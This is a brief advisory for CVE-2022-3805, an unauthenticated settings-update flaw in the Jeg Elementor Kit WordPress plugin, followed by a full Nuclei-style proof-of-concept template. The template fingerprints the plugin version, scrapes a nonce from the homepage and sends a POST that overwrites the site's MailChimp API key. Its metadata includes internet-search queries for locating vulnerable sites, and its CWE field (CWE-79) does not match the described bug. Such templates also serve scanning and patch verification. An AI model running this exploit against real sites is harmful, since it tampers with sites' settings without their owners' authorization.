The Jeg Elementor Kit plugin for WordPress is vulnerable to authorization bypass in various functions used to update the plugin settings in versions up to, and including, 2.5.6. Unauthenticated users can use an easily available nonce, obtained from pages edited by the plugin, to update the MailChimp API key, global styles, 404 page settings, and enabled elements.
PoC代码[已公开]
id: CVE-2022-3805
info:
name: Jeg Elementor Kit < 2.5.7 - Unauthenticated Settings Update
author: DhiyaneshDk,popcorn94
severity: high
description: |
The Jeg Elementor Kit plugin for WordPress is vulnerable to authorization bypass in various functions used to update the plugin settings in versions up to, and including, 2.5.6. Unauthenticated users can use an easily available nonce, obtained from pages edited by the plugin, to update the MailChimp API key, global styles, 404 page settings, and enabled elements.
remediation: Fixed in 2.5.7
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-3805
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jeg-elementor-kit/jeg-elementor-kit-256-unauthenticated-authorization-bypass
- https://wordpress.org/plugins/jeg-elementor-kit/#developers
- https://www.wordfence.com/threat-intel/vulnerabilities/id/c9955d65-afb3-4d28-abd2-9f2fec92d013
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L
cvss-score: 8.6
cve-id: CVE-2022-3805
cwe-id: CWE-79
epss-score: 0.16755
epss-percentile: 0.9467
cpe: cpe:2.3:a:jegtheme:jeg_elementor_kit:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: jegtheme
product: jeg_elementor_kit
framework: wordpress
shodan-query: http.html:"/wp-content/plugins/jeg-elementor-kit"
fofa-query: body="/wp-content/plugins/jeg-elementor-kit/"
publicwww-query: "/wp-content/plugins/jeg-elementor-kit/"
tags: cve,cve2022,wordpress,wp,wp-plugin,jeg-elementor-kit,vkev,unauth,intrusive,vuln
variables:
rand: "{{rand_text_numeric(5)}}"
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
GET /wp-content/plugins/jeg-elementor-kit/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'compare_versions(version, "< 2.5.7")'
- 'contains(body, "Jeg Elementor Kit")'
- 'status_code == 200'
condition: and
internal: true
extractors:
- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"
internal: true
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "jeg-elementor-kit")
- contains(content_type, "text/html")
condition: and
internal: true
extractors:
- type: regex
group: 1
name: nonce
regex:
- 'jkit_nonce = "([a-zA-Z0-9]{10})"'
internal: true
- type: regex
group: 1
name: url
regex:
- 'jkit_ajax_url = "(http[s]?://[^"]+)"'
internal: true
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
jkit-ajax-request=jkit_elements&form_data[mailchimp_api_key]={{rand}}&action=save_user_data&nonce={{nonce}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "Success Save Data")
- contains(content_type, "application/json")
condition: and
# digest: 490a00463044022000ed3bd419267f2bcbe99d93cc6c2d8b2cafd59024a77628b2529891325aae160220244143a89dcba13b88a9a2bd3e6905db85ed6df54256e7fcb2648b75f2cd2a17:922c64590222798bb761d5b6d8e72950